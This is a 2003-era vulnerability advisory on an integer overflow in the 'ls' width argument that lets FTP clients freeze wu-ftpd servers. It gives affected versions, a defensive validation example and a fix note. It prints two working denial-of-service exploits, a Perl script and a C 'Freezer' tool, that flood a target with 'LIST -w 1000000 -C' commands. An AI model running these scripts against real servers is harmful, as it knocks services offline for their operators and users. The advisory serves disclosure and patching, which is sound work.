Coreutils ls Command Overlong Width Argument Integer Overflow Vulnerability
Published: 2003-10-22
Updated: 2003-11-03
Severity: Medium
Threat: Remote denial of service
Error type: Boundary check error
Exploitation mode: Server mode
BUGTRAQ ID: 8875

Affected systems

GNU fileutils 4.0
  +Debian Linux 2.2 68k
  +Debian Linux 2.2 alpha
  +Debian Linux 2.2 arm
  +Debian Linux 2.2 IA-32
  +Debian Linux 2.2 powerpc
  +Debian Linux 2.2 sparc
  +Immunix Immunix OS 7+
  +RedHat Linux 6.2
  +RedHat Linux 6.2 i386
  +RedHat Linux 7.0
  +RedHat Linux 7.0 i386
  +Slackware Linux 7.0
  +Slackware Linux 7.1
GNU fileutils 4.0.36
  +RedHat Linux 7.1
  +RedHat Linux 7.1 i386
  +RedHat Linux for iSeries 7.1
  +RedHat Linux for pSeries 7.1
GNU fileutils 4.1
  +Caldera OpenLinux Server 3.1
  +Caldera OpenLinux Server 3.1.1
  +Caldera OpenLinux Workstation 3.1
  +Caldera OpenLinux Workstation 3.1.1
  +RedHat Linux 7.2
  +RedHat Linux 7.2 alpha
  +RedHat Linux 7.2 i386
  +RedHat Linux 7.2 ia64
  +RedHat Linux 7.3
  +RedHat Linux 7.3 i386
  +S.u.S.E. Linux 7.0 alpha
  +S.u.S.E. Linux 7.0 i386
  +S.u.S.E. Linux 7.0 ppc
  +S.u.S.E. Linux 7.0 sparc
  +S.u.S.E. Linux 7.1 alpha
  +S.u.S.E. Linux 7.1 ppc
  +S.u.S.E. Linux 7.1 sparc
  +S.u.S.E. Linux 7.1 x86
  +S.u.S.E. Linux 7.2 i386
  +S.u.S.E. Linux 7.3 i386
  +S.u.S.E. Linux 7.3 ppc
  +S.u.S.E. Linux 7.3 sparc
  +Slackware Linux 8.0
  +Sun Cobalt Qube 3
  +Sun Cobalt RaQ 4
  +Sun Cobalt RaQ 550
  +Sun Cobalt RaQ XTR
  +Sun Linux 5.0
  +Sun Linux 5.0.3
  +Sun Linux 5.0.5
  +Sun Linux 5.0.6
  +Sun LX50
  +Trustix Secure Linux 1.1
  +Trustix Secure Linux 1.2
  +Trustix Secure Linux 1.5
GNU fileutils 4.1.6
  +Sun Linux 5.0.6
GNU fileutils 4.1.7
Washington University wu-ftpd 2.4.1
Washington University wu-ftpd 2.4.2 academ[BETA1-15
  +Caldera OpenLinux Standard 1.2
Washington University wu-ftpd 2.4.2 academ[BETA-18]
  +RedHat Linux 5.2 i386
Washington University wu-ftpd 2.4.2 VR17
Washington University wu-ftpd 2.4.2 VR16
Washington University wu-ftpd 2.4.2 (beta 18) VR9
Washington University wu-ftpd 2.4.2 (beta 18) VR8
Washington University wu-ftpd 2.4.2 (beta 18) VR7
Washington University wu-ftpd 2.4.2 (beta 18) VR6
Washington University wu-ftpd 2.4.2 (beta 18) VR5
Washington University wu-ftpd 2.4.2 (beta 18) VR4
Washington University wu-ftpd 2.4.2 (beta 18) VR15
Washington University wu-ftpd 2.4.2 (beta 18) VR14
Washington University wu-ftpd 2.4.2 (beta 18) VR13
Washington University wu-ftpd 2.4.2 (beta 18) VR12
Washington University wu-ftpd 2.4.2 (beta 18) VR11
Washington University wu-ftpd 2.4.2 (beta 18) VR10
Washington University wu-ftpd 2.5.0
  +Caldera OpenLinux 2.4
  +Caldera OpenLinux Desktop 2.3
  +RedHat Linux 6.0
  +RedHat Linux 6.0 alpha
  +RedHat Linux 6.0 sparc
  +SCO eDesktop 2.4
  +SCO eServer 2.3
  +SCO eServer 2.3.1
Washington University wu-ftpd 2.6.0
  +Cobalt Qube 1.0
  +Conectiva Linux 4.0
  +Conectiva Linux 4.0 es
  +Conectiva Linux 4.1
  +Conectiva Linux 4.2
  +Conectiva Linux 5.0
  +Conectiva Linux 5.1
  +Debian Linux 2.2
  +Debian Linux 2.2 68k
  +Debian Linux 2.2 alpha
  +Debian Linux 2.2 arm
  +Debian Linux 2.2 powerpc
  +Debian Linux 2.2 sparc
  -FreeBSD FreeBSD 4.3
  -FreeBSD FreeBSD 4.3 -RELEASE
  -FreeBSD FreeBSD 4.3 -STABLE
  -FreeBSD FreeBSD 4.4
  +HP HP-UX 11.0
  +HP HP-UX 11.11
  +RedHat Linux 5.2 alpha
  +RedHat Linux 5.2 i386
  +RedHat Linux 5.2 sparc
  +RedHat Linux 6.0
  +RedHat Linux 6.0 alpha
  +RedHat Linux 6.0 sparc
  +RedHat Linux 6.1 alpha
  +RedHat Linux 6.1 i386
  +RedHat Linux 6.1 sparc
  +RedHat Linux 6.2 alpha
  +RedHat Linux 6.2 i386
  +RedHat Linux 6.2 sparc
  +S.u.S.E. Linux 6.1
  +S.u.S.E. Linux 6.1 alpha
  +S.u.S.E. Linux 6.2
  +S.u.S.E. Linux 6.3
  +S.u.S.E. Linux 6.3 alpha
  +S.u.S.E. Linux 6.3 ppc
  +S.u.S.E. Linux 6.4
  +S.u.S.E. Linux 6.4 alpha
  +S.u.S.E. Linux 6.4 ppc
  +S.u.S.E. Linux 7.0 alpha
  +S.u.S.E. Linux 7.0 i386
  +S.u.S.E. Linux 7.0 ppc
  +S.u.S.E. Linux 7.0 sparc
  +S.u.S.E. Linux 7.1 alpha
  +S.u.S.E. Linux 7.1 ppc
  +S.u.S.E. Linux 7.1 sparc
  +S.u.S.E. Linux 7.1 x86
  +S.u.S.E. Linux 7.2 i386
  +S.u.S.E. Linux 7.3 i386
  +S.u.S.E. Linux 7.3 ppc
  +S.u.S.E. Linux 7.3 sparc
  +TurboLinux Turbo Linux 4.0
  +Wirex Immunix OS 6.2
Washington University wu-ftpd 2.6.1
  +Caldera OpenLinux 2.3
  +Caldera OpenLinux Server 3.1
  +Cobalt Qube 1.0
  +Conectiva Linux 6.0
  +Conectiva Linux 7.0
  +Conectiva Linux 8.0
  -FreeBSD FreeBSD 4.3
  -FreeBSD FreeBSD 4.3 -RELEASE
  -FreeBSD FreeBSD 4.3 -STABLE
  -FreeBSD FreeBSD 4.4
  -FreeBSD FreeBSD 5.0
  -FreeBSD FreeBSD 5.0 alpha
  +MandrakeSoft Corporate Server 1.0.1
  +MandrakeSoft Linux Mandrake 6.0
  +MandrakeSoft Linux Mandrake 6.1
  +MandrakeSoft Linux Mandrake 7.0
  +MandrakeSoft Linux Mandrake 7.1
  +MandrakeSoft Linux Mandrake 7.2
  +MandrakeSoft Linux Mandrake 8.0
  +MandrakeSoft Linux Mandrake 8.0 ppc
  +MandrakeSoft Linux Mandrake 8.1
  +RedHat Linux 7.0 alpha
  +RedHat Linux 7.0 i386
  +RedHat Linux 7.0 sparc
  +RedHat Linux 7.1 alpha
  +RedHat Linux 7.1 i386
  +RedHat Linux 7.1 i586
  +RedHat Linux 7.1 i686
  +RedHat Linux 7.1 ia64
  +RedHat Linux 7.1 noarch
  +RedHat Linux 7.2 alpha
  +RedHat Linux 7.2 athlon
  +RedHat Linux 7.2 i386
  +RedHat Linux 7.2 i586
  +RedHat Linux 7.2 i686
  +RedHat Linux 7.2 ia64
  +RedHat Linux 7.2 noarch
  -S.u.S.E. Linux 7.0
  -S.u.S.E. Linux 7.0 alpha
  -S.u.S.E. Linux 7.0 ppc
  -S.u.S.E. Linux 7.0 sparc
  -S.u.S.E. Linux 7.1
  -S.u.S.E. Linux 7.1 alpha
  -S.u.S.E. Linux 7.1 ppc
  -S.u.S.E. Linux 7.1 sparc
  -S.u.S.E. Linux 7.1 x86
  -S.u.S.E. Linux 7.2
  -S.u.S.E. Linux 7.3
  +SCO eDesktop 2.4
  +SCO eServer 2.3.1
  +SCO Open Server 5.0
  +SCO Open Server 5.0.1
  +SCO Open Server 5.0.2
  +SCO Open Server 5.0.3
  +SCO Open Server 5.0.4
  +SCO Open Server 5.0.5
  +SCO Open Server 5.0.6
  +SCO Open Server 5.0.6 a
  -Slackware Linux 7.0
  -Slackware Linux 7.1
  -Slackware Linux 8.0
  +TurboLinux TL Workstation 6.1
  +TurboLinux Turbo Linux 6.0
  +TurboLinux Turbo Linux 6.0.1
  +TurboLinux Turbo Linux 6.0.2
  +TurboLinux Turbo Linux 6.0.3
  +TurboLinux Turbo Linux 6.0.4
  +TurboLinux Turbo Linux 6.0.5
  +Wirex Immunix OS 7+
  +Wirex Immunix OS 7.0
  +Wirex Immunix OS 7.0 -Beta
Washington University wu-ftpd 2.6.2
  +Compaq Tru64 4.0 b
  +Compaq Tru64 4.0 d
  +Compaq Tru64 4.0 d PK9 (BL17)
  +Compaq Tru64 4.0 e
  +Compaq Tru64 4.0 f
  +Compaq Tru64 4.0 f PK6 (BL17)
  +Compaq Tru64 4.0 f PK7 (BL18)
  +Compaq Tru64 4.0 g
  +Compaq Tru64 4.0 g PK3 (BL17)
  +Compaq Tru64 5.0
  +Compaq Tru64 5.0 PK4 (BL17)
  +Compaq Tru64 5.0 PK4 (BL18)
  +Compaq Tru64 5.0 a
  +Compaq Tru64 5.0 a PK3 (BL17)
  +Compaq Tru64 5.0 f
  +Compaq Tru64 5.1
  +Compaq Tru64 5.1 PK3 (BL17)
  +Compaq Tru64 5.1 PK4 (BL18)
  +Compaq Tru64 5.1 PK5 (BL19)
  +Compaq Tru64 5.1 PK6 (BL20)
  +Compaq Tru64 5.1 a
  +Compaq Tru64 5.1 a PK1 (BL1)
  +Compaq Tru64 5.1 a PK2 (BL2)
  +Compaq Tru64 5.1 a PK3 (BL3)
  +Compaq Tru64 5.1 a PK4 (BL21)
  +Compaq Tru64 5.1 a PK5 (BL23)
  +Compaq Tru64 5.1 b
  +Compaq Tru64 5.1 b PK1 (BL1)
  +Compaq Tru64 5.1 b PK2 (BL22)
  +Conectiva Linux 9.0
  +Debian Linux 3.0
  +Debian Linux 3.0 alpha
  +Debian Linux 3.0 arm
  +Debian Linux 3.0 hppa
  +Debian Linux 3.0 ia-32
  +Debian Linux 3.0 ia-64
  +Debian Linux 3.0 m68k
  +Debian Linux 3.0 mips
  +Debian Linux 3.0 mipsel
  +Debian Linux 3.0 ppc
  +Debian Linux 3.0 s/390
  +Debian Linux 3.0 sparc
  +MandrakeSoft Linux Mandrake 8.2
  +MandrakeSoft Linux Mandrake 8.2 ppc
  +Sun Linux 5.0.7
Washington University wu-ftpd 2.6.2
  +TurboLinux TL Advanced Server 6.0
  +TurboLinux TL Server 6.1
  +TurboLinux TL Workstation 6.0

Description

The Coreutils 'ls' command implementation contains an integer overflow. The flaw lies in how the program handles the width and column-count command-line arguments: an overlong argument causes an integer overflow, and the overflowed value may make the program behave unexpectedly. Other software that invokes the 'ls' command may be exposed to denial-of-service attacks as a result.
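
The kind of check the description calls for, shown as an added example (not code from coreutils, wu-ftpd or the original page): the width argument is range-checked when parsed, and the allocation size derived from it is checked for wraparound before use. `MAX_LINE_WIDTH`, `MIN_COLUMN_WIDTH`, the function names and the column-table sizing are assumptions made for illustration.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed values for this example; they are not taken from coreutils. */
#define MAX_LINE_WIDTH   4096  /* policy cap on an accepted width */
#define MIN_COLUMN_WIDTH 3     /* narrowest column the layout allows */

/* Parse a "-w"-style width. Returns 0 and stores the value, or -1 when the
   text is not a plain number, overflows long, is <= 0, or exceeds the cap. */
int parse_width(const char *arg, size_t *width_out)
{
    char *end;
    if (arg == NULL || *arg == '\0')
        return -1;
    errno = 0;
    long v = strtol(arg, &end, 10);
    if (errno == ERANGE || *end != '\0' || v <= 0 || v > MAX_LINE_WIDTH)
        return -1;
    *width_out = (size_t)v;
    return 0;
}

/* Size a hypothetical max_cols x max_cols table of size_t column widths.
   Returns -1 instead of letting either multiplication wrap around. */
int column_table_bytes(size_t width, size_t *bytes_out)
{
    size_t max_cols = width < MIN_COLUMN_WIDTH ? 1 : width / MIN_COLUMN_WIDTH;
    if (max_cols > SIZE_MAX / max_cols)
        return -1;
    if (max_cols * max_cols > SIZE_MAX / sizeof(size_t))
        return -1;
    *bytes_out = max_cols * max_cols * sizeof(size_t);
    return 0;
}

int main(void)
{
    /* Constructed inputs; 1000000 is the width used by the page's test code. */
    const char *samples[] = { "80", "1000000", "99999999999999999999", "-5" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        size_t w = 0, bytes = 0;
        if (parse_width(samples[i], &w) || column_table_bytes(w, &bytes))
            printf("%-20s rejected\n", samples[i]);
        else
            printf("%-20s width=%zu table=%zu bytes\n", samples[i], w, bytes);
    }
    return 0;
}
```

A service that passes client-supplied listing options through to 'ls' can apply the same parse-and-cap step to the option value before invoking it.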

Test code

```perl
#!/usr/bin/perl
# DoS sploit for ls
# tested against wu-ftpd 2.6.2
# coded by (c) druid
# greets to viator
use Net::FTP;

(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "halt\@xyu.com";
$cols=1000000;#you can increase this value for more destructive result ;)
print ":: Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
$ftp->cwd("/");
while ($count) {
    $ftp->ls("-w $cols -C");
    $count--;
}
print "Done!\n";
$ftp->quit;
```

```c
/*
 *
 * http://www.rosiello.org
 * (c) Rosiello Security
 *
 * Copyright Rosiello Security 2003
 * All Rights reserved.
 *
 * Tested on Red Hat 9.0
 *
 * Author: Angelo Rosiello
 * Mail : [email protected]
 * URL : http://www.rosiello.org
 *
 * This software is only for educational purpose.
 * Do not use it against machines different from yours.
 * Respect law.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>

void addr_initialize( struct sockaddr_in *address, int port, long IPaddr );
void usage( char *program );

int main( int argc, char **argv )
{
    int i, sd, PORT, loop, error;
    char user[30], password[30], ch = '\0';
    struct sockaddr_in server_addr;

    fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
    fprintf( stdout, "http://www.rosiello.org\n" );
    fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

    if( argc != 6 ) usage( argv[0] );

    /* user[] and password[] hold 30 bytes, so cap the inputs at 20 */
    if( strlen( argv[3] ) > 20 ) exit( 0 );
    if( strlen( argv[4] ) > 20 ) exit( 0 );

    sprintf( user, "USER %s\n", argv[3] );
    sprintf( password, "PASS %s\n", argv[4] );

    PORT = atoi( argv[2] );
    loop = atoi( argv[5] );

    addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
    sd = socket( AF_INET, SOCK_STREAM, 0 );

    error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
    if( error != 0 )
    {
        perror( "Something wrong with the connection" );
        exit( 0 );
    }

    /* read the server banner up to the first newline */
    while ( ch != '\n' )
    {
        recv( sd, &ch, 1, 0);
        printf("%c", ch );
    }

    ch = '\0';

    printf( "Connection executed, now waiting to log in...\n" );

    printf( "%s", user );
    send( sd, user, strlen( user ), 0 );
    while ( ch != '\n' )
    {
        recv( sd, &ch, 1, 0);
        printf("%c", ch );
    }

    printf( "%s", password );

    ch = '\0';

    send( sd, password, strlen( password ), 0 );
    while ( ch != '\n' )
    {
        recv( sd, &ch, 1, 0);
        printf("%c", ch );
    }

    printf( "Sending the DoS query\n" );
    for( i=0; i<loop; i++ )
    {
        write( sd, "LIST -w 1000000 -C\n", 19 );
    }

    printf( "All done\n" );
    close( sd );
    return 0;
}

void addr_initialize (struct sockaddr_in *address, int port, long IPaddr)
{
    address -> sin_family = AF_INET;
    address -> sin_port = htons((u_short)port);
    address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
    fprintf(stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program);
    exit(0);
}
```

Solution

Vendors have fixed this vulnerability in the latest versions of their fileutils packages.

Related information

WU-FTPD 2.6.2 Freezer
http://archives.neohapsis.com/archives/bugtraq/2003-10/0331.html